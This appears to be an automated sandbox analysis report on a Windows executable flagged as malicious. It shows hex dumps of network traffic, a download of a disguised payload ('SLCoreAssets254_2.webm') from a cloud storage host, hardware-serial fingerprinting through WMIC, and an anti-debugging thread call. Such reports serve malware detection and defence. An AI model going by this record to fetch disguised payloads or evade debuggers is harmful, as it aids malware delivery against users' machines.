                                                                                                                                            2024-11-06 15:40:37 UTC1400INData Raw: 66 89 41 38 89 59 60 89 51 64 66 89 41 50 89 59 78 89 51 7c 66 89 41 68 89 99 80 00 00 00 89 99 84 00 00 00 89 99 88 00 00 00 89 99 a8 00 00 00 89 91 ac 00 00 00 66 89 81 98 00 00 00 89 99 c0 00 00 00 89 91 c4 00 00 00 66 89 81 b0 00 00 00 89 99 d8 00 00 00 89 91 dc 00 00 00 66 89 81 c8 00 00 00 89 99 f0 00 00 00 89 91 f4 00 00 00 66 89 81 e0 00 00 00 89 99 08 01 00 00 89 91 0c 01 00 00 66 89 81 f8 00 00 00 89 99 20 01 00 00 89 91 24 01 00 00 66 89 81 10 01 00 00 89 99 3c 01 00 00 89 91 40 01 00 00 66 89 81 2c 01 00 00 89 99 54 01 00 00 89 91 58 01 00 00 66 89 81 44 01 00 00 89 99 6c 01 00 00 89 91 70 01 00 00 66 89 81 5c 01 00 00 89 99 84 01 00 00 89 91 88 01 00 00 66 89 81 74 01 00 00 89 99 9c 01 00 00 89 91 a0 01 00 00 66 89 81 8c 01 00 00 89 99 b8 01
                                                                                                                                            Data Ascii: fA8Y`QdfAPYxQ|fAhfffff $f<@f,TXfDlpf\ftf
                                                                                                                                            2024-11-06 15:40:37 UTC1400INData Raw: d0 2b c1 6a 18 99 5b f7 fb 89 75 dc 85 c0 74 2b 8d 45 dc 50 8d 45 d0 50 6b c6 18 03 c1 8b cf 50 e8 39 00 00 00 8b 45 d4 8b 4d d0 2b c1 99 f7 fb 8b 75 dc 46 89 75 dc 3b f0 72 d5 8d 4d d0 e8 8a e4 ff ff 8d 4d e0 e8 d4 e4 ff ff 8b 4d f8 b0 01 5f 5e 33 cd 5b e8 1c 74 03 00 c9 c2 04 00 55 8b ec 81 ec c8 00 00 00 a1 0c 60 46 00 33 c5 89 45 f8 8b 45 0c 53 56 8b 75 08 57 8b f9 89 85 38 ff ff ff 8b 45 10 8d 4d c8 68 30 99 45 00 89 b5 3c ff ff ff 89 85 40 ff ff ff e8 fe e3 ff ff 8d 45 c8 50 56 e8 f5 fd ff ff 8d 4d c8 8a d8 e8 6d e4 ff ff 8d 4d c8 84 db 74 77 33 c0 c7 45 f4 07 00 00 00 33 f6 66 89 45 e0 68 30 99 45 00 89 75 f0 e8 c7 e3 ff ff 8d 45 e0 50 8d 45 c8 50 ff b5 3c ff ff ff e8 0e fe ff ff 8d 4d c8 8a d8 e8 2d e4 ff ff 84 db 74 32 39 77 30 74 16 be 9c 99 45
                                                                                                                                            Data Ascii: +j[ut+EPEPkP9EM+uFu;rMMM_^3[tU`F3EESVuW8EMh0E<@EPVMmMtw3E3fEh0EuEPEP<M-t29w0tE


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.1057356113.200.1.74437512C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-11-06 15:40:44 UTC1346OUTGET /file/350f2ed90l674df0a13399cb294b0863?bkt=en-82d2bca2fdceac3fabfb1ed2452331aa4ea92c5a28680a39063f76c7d20de64ee244b6b41ae7090f&fid=1103614021113-16051585-129100381070572&time=1730907642&sign=FDTAXUbGERQlBHSKfWqi-DCb740ccc5511e5e8fedcff06b081203-r6WwRtBhYnf79bsQAZEomL42rw0%3D&to=75&size=5941360&sta_dx=5941360&sta_cs=317&sta_ft=webm&sta_ct=3&sta_mt=3&fm2=MH%2CYangquan%2CAnywhere%2C%2CNone%2Cany&ctime=1729728590&mtime=1729728590&dt3=24&resv0=-1&resv1=0&resv2=rlim&resv3=5&resv4=5941360&vuk=1103614021113&iv=0&vl=1&htype=&randtype=&tkbind_id=0&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=en-3cf4596bf0ad06de52fd9a80914cd67c97711c5c404e764460b4925d0024dd1473b613b062ffe5bb&expires=8h&rt=pr&r=569376143&mlogid=7212657344168653326&vbdid=-&fin=SLCoreAssets254_2.webm&fn=SLCoreAssets254_2.webm&err_ver=1.0&rtype=1&clienttype=70&dp-logid=7212657344168653326&dp-callid=0.1.1&hps=1&tsl=0&csl=0&fsl=-1&csign=pnawazyXxvhDSfXVs1mpjf37Nwk%3D&so=0&ut=6&uter=4&serv=1&uc=3871693838&ti=39965399e74cce84af8a76d067ba343c3eb28ff7aebe9176&hfl [TRUNCATED]
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Host: bjbgp01.baidupcs.com
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-11-06 15:40:45 UTC620INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:44 GMT
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Connection: close
                                                                                                                                            x-bs-file-size: 5941360
                                                                                                                                            x-bs-meta-crc32: 1681592990
                                                                                                                                            Cache-Control: max-age=259200
                                                                                                                                            ETag: bfb790ca20b4b1be024290b90fae4b4b
                                                                                                                                            x-bs-client-ip: MTczLjI1NC4yNTAuODA=
                                                                                                                                            Content-Length: 5941360
                                                                                                                                            x-bs-request-id: MTAuMzkuMTI1LjE2OjMwMDI6NzIxMjY1NzM0NDE2ODY1MzMyNjoyMDI0LTExLTA2IDIzOjQwOjQ0
                                                                                                                                            Content-Disposition: attachment;filename="SLCoreAssets254_2.webm"
                                                                                                                                            Content-MD5: bfb790ca20b4b1be024290b90fae4b4b
                                                                                                                                            superfile: 2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Last-Modified: Thu, 24 Oct 2024 00:09:50 GMT
                                                                                                                                            Server: POMS/CloudUI 1.0
                                                                                                                                            2024-11-06 15:40:45 UTC15764INData Raw: 84 92 87 d4 50 6d 78 2b 12 38 e7 24 5c 62 77 24 5b 62 77 24 a0 9d 77 24 e7 62 77 24 5f 62 77 24 1f 62 77 24 5f 62 77 24 5f 62 77 24 5f 62 77 24 5f 62 77 24 5f 62 77 24 5f 62 77 24 5f 62 77 24 5f 62 77 24 df 62 77 24 51 7d cd 2a 5f d6 7e e9 7e da 76 68 92 43 23 4c 36 11 57 54 2d 0d 10 56 3e 0f 57 47 3e 0c 19 4b 2b 42 15 41 7f 10 02 4a 7f 0b 19 04 1b 2d 24 04 32 0d 13 41 71 6f 7a 2e 7b 62 77 24 5f 62 77 24 0f 27 77 24 3b e4 7d 24 10 ed 6e 43 5f 62 77 24 5f 62 77 24 af 62 55 04 54 60 79 0d 5f 2c 7a 24 5f 58 7a 24 5f 62 77 24 5f 6b e0 24 5f 72 77 24 5f 62 77 a4 5e 62 77 24 5f 72 77 24 5f 60 77 24 59 62 77 24 5f 62 77 24 59 62 77 24 5f 62 77 24 5f b2 d8 24 5f 66 77 24 4f 50 2c 24 5c 62 17 25 5f 62 67 24 5f 62 77 24 5f 72 77 24 5f 62 77 24 5f 62 67 24 5f 62 77
                                                                                                                                            Data Ascii: Pmx+8$\bw$[bw$w$bw$_bw$bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$bw$Q}*_~~vhC#L6WT-V>WG>K+BAJ-$2Aqoz.{bw$_bw$'w$;}$nC_bw$_bw$bUT`y_,z$_Xz$_bw$_k$_rw$_bw^bw$_rw$_`w$Ybw$_bw$Ybw$_bw$_$_fw$OP,$\b%_bg$_bw$_rw$_bw$_bg$_bw
                                                                                                                                            2024-11-06 15:40:45 UTC16384INData Raw: fa 6f c6 9a 37 f0 1f 01 9c 04 7c b6 17 60 89 32 03 fa ba 42 81 48 55 42 00 58 cc df c1 3c f9 a8 06 61 35 f6 c7 30 a5 42 c1 ef db d8 a5 c4 9b 89 72 fb 19 5f 9d fb 08 7e 04 61 35 7e 61 bc ce d8 ad 00 89 60 3a 6f 9d de 8e 53 d7 8b 70 4b bf 35 8e e0 41 76 14 b6 a4 b0 1d 5a aa 76 29 0c 11 c1 35 08 b7 b7 cb bf ef 8a 3e 90 8a 13 28 74 b1 28 dd c5 c7 3a bd 37 1e 7a dc 99 c5 1c 83 de 78 be 86 72 c9 71 89 8d 04 7a 08 60 f9 be 1e 77 3b c1 9b 53 71 94 57 fa f2 b4 ad 56 28 2c f1 1f c9 8a e2 81 e5 1c bc 34 77 fa ef 88 af 7a 5f ea bf 8e 87 3c 77 c0 2f 58 af 7a 5f 08 9b 86 87 3c 77 dc bc 45 5b 8e da ab 0e f5 03 62 57 21 7d f8 6b 5d 93 9e 86 9b 1f c7 25 3e da 36 16 5c d7 38 fd a7 e0 be 31 75 31 19 88 db a0 9d cd a9 00 87 6c 99 e9 c7 88 58 82 c6 31 d3 55 69 df 61 36 ef 23
                                                                                                                                            Data Ascii: o7|`2BHUBX<a50Br_~a5~a`:oSpK5AvZv)5>(t(:7zxrqz`w;SqWV(,4wz_<w/Xz_<wE[bW!}k]%>6\81u1lX1Uia6#
                                                                                                                                            2024-11-06 15:40:45 UTC16384INData Raw: f9 95 e6 94 59 79 db dd e6 2d b2 d8 e9 5e d2 b4 20 c4 01 e2 9a 8e 16 d3 a8 0f ae 15 b0 36 83 08 9a d6 30 18 ab 4e b2 f0 00 0d 5f f4 9a d0 5b 2e 8e 58 8a 04 0f 8c d1 ca 36 f3 db 03 c9 be 4d e8 ab 1d e1 f8 65 e6 0b d3 c9 be 4d 78 83 05 e1 f8 65 96 d3 3b c9 be 4d f8 1b ad e1 f8 65 46 73 db c9 be 4d f0 6b 2d e1 f8 65 16 b3 9d e0 42 4d bc bf c2 ed a1 73 27 1e d9 cf 36 f7 df 24 4b 19 79 df bb 08 15 31 3f f7 f1 f2 93 19 79 df a1 2c 35 31 3f f7 7b 0c 43 19 79 df 7b 78 5d 31 3f f7 77 9e f3 19 79 df 2f 3e 05 31 3f f7 23 1e 7b 19 79 df 13 17 88 c5 cb 72 a2 d5 ec e5 20 a1 9d 88 db 28 9e b3 f0 a6 bb a7 90 48 bd b6 d5 08 28 db 5b 96 23 30 6e f3 1d be 7d 68 28 db 5b f6 83 08 6e f3 1d a6 f5 b0 28 db 5b 3e 43 a0 6e f3 1d 3e f5 80 28 db 5b 1e 8b 80 6e f3 1d 0e bc b0 b3 de
                                                                                                                                            Data Ascii: Yy-^ 60N_[.X6MeMxe;MeFsMk-eBMs'6$Ky1?y,51?{Cy{x]1?wy/>1?#{yr (H([#0n}h([n([>Cn>([n
                                                                                                                                            2024-11-06 15:40:45 UTC16384INData Raw: 66 6b db 5b 08 e4 db f5 f6 8e 21 c5 0a e2 a5 52 c8 c9 08 4d 66 03 47 8d 20 61 5c 65 6f cb 08 49 64 3b 47 8d 20 cb b0 85 6f cb 08 59 26 73 47 8d 20 ff 66 65 6f cb 08 19 ec 9b 47 8d 20 d5 fe ca f8 f4 75 da a0 9d 88 9a e5 bc 2e 34 1f 4b 83 33 80 2a 57 ba 55 ce 08 24 f7 54 7d 88 20 ca 97 ea 55 ce 08 74 97 74 7d 88 20 9a bf ba 55 ce 08 24 17 bc 7d 88 20 22 bf 12 55 ce 08 bc c7 c4 7d 88 20 5a 76 8b 8e cb f2 2f bd 37 f7 f0 b7 fc a4 75 df da 47 5a 8c 33 f7 c8 d1 b4 a4 75 df 68 1d 12 8c 33 f7 56 1b b4 5b 8a 20 74 d5 8d 0d e2 37 ca f9 4e d9 5b 2f 86 c1 08 f1 1d f9 f8 b9 e9 4f 5d 90 9d 88 db 89 91 50 02 17 d8 22 25 09 91 12 ef c6 3b 77 a2 45 d2 ff 7f 5f 9d e8 34 00 15 f7 27 e0 41 d3 db 7e 48 b2 d5 53 a8 c9 64 db b2 f5 80 a0 84 6c 6f 32 19 77 24 5f 62 b4 5d fd c2 88
                                                                                                                                            Data Ascii: fk[!RMfG a\eoId;G oY&sG feoG u.4K3*WU$T} Utt} U$} "U} Zv/7uGZ3uh3V[ t7N[/O]P"%;wE_4'A~HSdlo2w$_b]
                                                                                                                                            2024-11-06 15:40:45 UTC16384INData Raw: 8b 05 89 87 20 a2 7f 93 a1 c1 08 cc 03 9d 89 87 20 de 53 bb a1 c1 08 14 1b f5 89 87 20 3a d7 23 a1 c1 08 1c 4b bd 89 87 20 eb 31 f2 f8 1d b5 c2 56 63 2b a4 c9 30 5c 5c e7 c3 68 d0 5d 2e 7f 24 66 f9 96 00 5e 62 77 64 16 f3 5b 05 fd e5 8f 44 1f e6 56 b9 9e 42 0f 7b 43 43 ea e5 c0 ea 17 d0 7e ff b6 24 40 75 93 05 c2 a3 58 4b 40 7e 56 b9 9e ba a0 7a 7a 33 2f f7 3f 32 f7 44 3b d9 89 87 20 86 4b cf a1 c1 08 dc 9f 69 89 87 20 a6 ff 77 a1 c1 08 e8 63 f1 89 87 20 f6 83 37 a1 c1 08 d4 df 21 89 87 20 7f fd f2 f8 1d 01 5e ca 63 2b a4 bd 98 80 90 e7 c3 68 e4 21 2e 7f 24 1a f9 96 00 5e 62 77 64 95 47 af 05 fd e5 7b 40 4b 12 56 b9 9e b6 cb 30 3f 43 ea e5 3b a1 44 54 7e ff b6 c0 a3 1e 0f 05 c2 a3 b3 8f 24 7a 56 b9 9e 69 4b 06 7a 33 2f 19 d1 27 e7 24 a7 4f 1e db e2 9b 7d
                                                                                                                                            Data Ascii: S :#K 1Vc+0\\h].$f^bwd[DVB{CC~$@uXK@~Vzz3/?2D; Ki wc 7! ^c+h!.$^bwdG{@KV0?C;DT~$zViKz3/'$O}
                                                                                                                                            2024-11-06 15:40:45 UTC16384INData Raw: 3c 41 23 b4 3d ff b6 67 dc be df 46 c2 a3 bb 47 b3 3a 15 b9 9e 26 53 de 39 33 2f 55 02 90 88 4d ca 58 09 2e 5f 5f 5e d6 21 68 77 35 32 98 09 2e 5f ef fa 5e 21 68 77 f1 f2 08 09 2e 5f f3 c2 76 21 68 77 55 8e 00 09 2e 5f 0f 6e ce 21 68 77 91 76 f0 09 2e 5f 13 ce 93 0c a5 80 bb b0 2b 44 7a df 5d 3c a8 db 9c 88 db 60 ab 16 7f 3e c0 f0 64 3f ed ec 45 c2 a3 5f a4 37 79 16 b9 9e 7d 00 c3 1c 03 ea e5 e8 f5 27 97 3e ff b6 f3 90 05 a4 45 c2 a3 27 84 26 07 26 7c 22 69 ca 5b 2d 6c a2 b1 11 e2 a9 ee 52 f7 39 a4 95 38 9a b1 11 e2 fc 70 e2 28 f7 48 17 e9 1d 95 20 12 bb 67 35 d3 08 b4 0f 73 05 f7 13 82 56 6f 1d 44 16 47 99 e2 78 c4 53 b9 88 db a0 5d 35 c1 41 2f f7 7b 99 ee ba d5 4d c6 fe 15 53 c7 c8 1e 1f 95 6f c6 84 e7 8f 2c b8 51 08 15 09 3a 77 55 81 f4 48 78 c2 e4 39
                                                                                                                                            Data Ascii: <A#=gFG:&S93/UMX.__^!hw52._^!hw._v!hwU._n!hwv._+Dz]<`>d?E_7y}'>E'&&|"i[-lR98p(H g5sVoDGxS]5A/{MSo,Q:wUHx9
                                                                                                                                            2024-11-06 15:40:45 UTC16384INData Raw: 8f bb 9c ec 23 86 ce 2e 5b 1c 01 93 14 16 09 8a 68 d9 5b a7 e5 49 4d f1 ae 03 18 4b 18 f6 27 b1 b4 3a 16 85 62 10 c0 48 43 be 4e 70 8a c1 c8 17 d3 d5 48 c7 c2 9b 10 93 60 b1 10 0d 38 d5 48 8b 3a 43 10 93 60 9f bf b0 8f 6c 63 69 92 1f d6 94 60 70 5d f7 3a 39 ef 69 c3 8e c9 01 eb 7c c7 6c b6 f1 19 9f a0 9d 88 db 1c 00 d4 1b 33 9f c2 42 2d bf f0 b0 9c 1b bc 5c 88 f5 2c d3 12 24 bf 95 5c 28 e7 7a c0 75 02 a2 fd 33 36 e7 64 2c 2b fa da 50 7e 71 6a 6c 34 24 eb 10 81 1d 91 9d 88 db 50 8f 47 ef a7 16 21 62 90 9d 88 db 7f 1a 67 e1 e9 14 b9 89 33 b6 f0 6f b3 06 b9 97 89 1e 0b d6 d5 13 5e 57 0c 16 f0 0e 30 21 84 23 13 0b e6 e7 9e 73 e0 c9 d5 4f 68 06 aa 05 1b 88 a0 3a 9c ad 06 30 77 cc 00 63 2e 76 5f 6b d4 8c 57 3a ff 69 07 34 f4 ba 21 82 8d 20 91 9d 88 db 1c 9e b0
                                                                                                                                            Data Ascii: #.[h[IMK':bHCNpH`8H:C`lci`p]:9i|l3B-\,$\(zu36d,+P~qjl4$PG!bg3o^W0!#sOh:0wc.v_kW:i4!
                                                                                                                                            2024-11-06 15:40:45 UTC16384INData Raw: c7 74 ac 86 a0 3b f1 b7 1b b0 29 6b d9 70 00 7c 5f 4f 19 18 1d c4 88 79 d1 86 35 82 a0 8e cf 78 a8 df 9f 40 13 cf 88 00 82 d6 71 ea a0 9d 88 86 fd 67 fa e3 0f 19 75 82 0a da 73 5d 90 9d 88 db da f2 6e 18 91 88 f3 ba ad c3 4e a0 10 5e b9 be 8d e1 85 f3 91 8f 3b ee 4e 7a df 6d 4c 80 45 3c bf 8a ad 8f 11 24 4e ea 0a a9 15 29 7c b9 f9 e1 6e 35 e1 e0 b7 3d 93 80 2d 89 9b 80 7e 62 9f 68 b3 50 48 a2 49 29 99 ad 97 53 b3 3d 79 14 09 67 57 a9 46 6d 1e 84 6a 95 fa 0f d7 de 5b ac 88 db a0 32 cb e3 8b 5c 39 f3 ab 76 a8 92 d1 da 7d 8b 20 44 49 8c 55 cd 08 12 51 d2 7d 8b 20 4c b1 4c 55 cd 08 d2 e1 fa 7d 8b 20 54 61 1c 55 cd 08 82 41 72 7d 8b 20 fc 79 f4 55 cd 08 7a 20 cd a5 8d f8 f0 b5 90 d6 93 b9 9d 20 93 ce 85 91 db 08 dd f6 83 b9 9d 20 13 8e 85 91 db 08 cd 46 f3 b9
                                                                                                                                            Data Ascii: t;)kp|_Oy5x@qgus]nN^;NzmLE<$N)|n5=-~bhPHI)S=ygWFmj[2\9v} DIUQ} LLU} TaUAr} yUz F
                                                                                                                                            2024-11-06 15:40:46 UTC16384INData Raw: 47 7e 1d a5 3b fc 96 b0 d2 31 8e 3f 8a f0 c1 a9 92 ce 33 34 20 59 0e 8d 2e 58 5d a9 4a 97 bf f9 81 90 aa 61 05 3f 2d ef 93 6e 78 50 ce a7 a2 34 a6 c4 48 94 4d 3e 5f 19 24 96 76 12 9e 37 36 c1 a4 67 06 e3 21 df a5 14 3a 58 f1 76 44 5e 36 57 a3 b1 0a ab 48 d8 6a d2 e1 a4 7e db c0 a7 b7 c2 19 ac e9 7f 83 e6 1d 1e b9 a2 ce 15 3e 1f 8d 5f ca a7 a7 34 90 53 f6 e1 73 a1 a8 51 58 f2 ad 25 68 3d 23 15 ae 9c 2a d1 a1 9f 89 69 5f 0e 7b 06 f9 24 37 44 d2 25 c5 db 23 f2 22 80 e7 f5 ce d5 21 9b 32 19 04 77 42 d6 f9 54 fd c8 29 88 9c d3 fb 62 77 24 df ad 60 92 a0 f0 1a 20 11 62 20 89 04 d4 df e4 a7 33 3e 97 42 7f d9 a8 2c 78 14 c0 6a 3b b2 5a 46 df 86 54 cd 50 8a 6f 33 58 ff 47 e6 70 80 ec 3e eb f2 dc 83 3d 16 08 40 c0 f4 35 50 01 81 5b 35 93 4f 5f a1 9d 88 1b 8f 8c 18
                                                                                                                                            Data Ascii: G~;1?34 Y.X]Ja?-nxP4HM>_$v76g!:XvD^6WHj~>_4SsQX%h=#*i_{$7D%#"!2wBT)bw$` b 3>B,xj;ZFTPo3XGp>=@5P[5O_
                                                                                                                                            2024-11-06 15:40:46 UTC16384INData Raw: 18 73 b4 90 be cb 3a 9c 20 2b b6 7d 12 da 08 55 5e 6b 3a 9c 20 d3 de d5 12 da 08 9d 3e 5b 3a 9c 20 0b 86 ad 12 da 08 8d 1e 7b 3a 9c 20 23 1e 35 12 da 08 fd 3e 1b 35 3b 93 59 fb 47 89 45 a8 5c 9e 44 52 b5 20 c4 66 aa ee 68 2a 1e 6c ee 21 80 61 fa 27 4c 84 72 5c 2b f4 1c 0d fd 02 36 f7 20 61 91 c4 42 67 98 6a 64 88 74 5c f1 be 71 0a 67 aa 5b 6d f0 32 25 5d 84 9a 60 ca 77 05 3e e7 5b f9 62 02 6f 40 8a 33 a3 8d 1b ae 87 bc 62 8a f5 5a 77 d2 19 a5 13 03 7f 44 d6 54 6d 5c 8e b0 8f 4d 61 a3 98 65 10 60 8f 65 c3 f4 ce 79 67 35 ed a5 b6 f7 6b 53 d1 d1 bd a6 6f a3 51 0f fb d7 7b a3 23 47 91 76 e3 3c d4 74 3f 38 f9 bd 15 03 84 3b a0 2d b4 20 c4 f4 53 1d f5 a6 61 a9 3e d5 01 ce 1d d1 d1 b3 ed 44 10 28 df c5 a8 ee 0f 91 0f 26 27 71 b9 49 49 0e 61 a1 a7 82 d3 da 27 5f
                                                                                                                                            Data Ascii: s: +}U^k: >[: {: #5>5;YGE\DR fh*l!a'Lr\+6 aBgjdt\qg[m2%]`w>[bo@3bZwDTm\Mae`eyg5kSoQ{#Gv<t?8;- Sa>D(&'qIIa'_


                                                                                                                                            Statistics

                                                                                                                                            CPU Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Memory Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            High Level Behavior Distribution

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:10:39:56
                                                                                                                                            Start date:06/11/2024
                                                                                                                                            Path:C:\Users\user\Desktop\VZ7xFmeuPX.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\VZ7xFmeuPX.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:28'536'832 bytes
                                                                                                                                            MD5 hash:C7B9FAD6691E715033DACD193D65F5BF
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:10:40:04
                                                                                                                                            Start date:06/11/2024
                                                                                                                                            Path:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:28'536'832 bytes
                                                                                                                                            MD5 hash:C62F27864C7A540CAFBD0BDA87D99468
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:11
                                                                                                                                            Start time:10:40:16
                                                                                                                                            Start date:06/11/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:wmic BaseBoard get SerialNumber
                                                                                                                                            Imagebase:0x930000
                                                                                                                                            File size:427'008 bytes
                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:12
                                                                                                                                            Start time:10:40:16
                                                                                                                                            Start date:06/11/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff620390000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:14
                                                                                                                                            Start time:10:40:23
                                                                                                                                            Start date:06/11/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:68'040 bytes
                                                                                                                                            MD5 hash:D863E48A39F83476825B3B4F2379FCF1
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 24%, ReversingLabs
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:15
                                                                                                                                            Start time:10:40:30
                                                                                                                                            Start date:06/11/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:68'040 bytes
                                                                                                                                            MD5 hash:D863E48A39F83476825B3B4F2379FCF1
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Disassembly

                                                                                                                                            Reset < >

                                                                                                                                              Executed Functions

                                                                                                                                              Function 6C656130 Relevance: 1.5, APIs: 1, Instructions: 8nativethreadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000), ref: 6C656138
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InformationThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4046476035-0
                                                                                                                                              • Opcode ID: 6e980b68ed7dcda46048f2a905259a181a835762cd997db5074ac4026b8a9ed7
                                                                                                                                              • Instruction ID: f9d30932b14d6653a4a85ff258a641447222187c0a6e50b8a9d84c8928b3bf10
                                                                                                                                              • Opcode Fuzzy Hash: 6e980b68ed7dcda46048f2a905259a181a835762cd997db5074ac4026b8a9ed7
                                                                                                                                              • Instruction Fuzzy Hash: 5CB0123038230071FF2005310CC7F4425140742FA0F3803003331AC0D0C5C0A0805129
                                                                                                                                              Function 6C653200 Relevance: 6.2, APIs: 4, Instructions: 158COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C656130: NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000), ref: 6C656138
                                                                                                                                              • __alldvrm.LIBCMT ref: 6C6532CD
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6532F0
                                                                                                                                              • __Xtime_get_ticks.LIBCPMT ref: 6C653340
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6533A9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
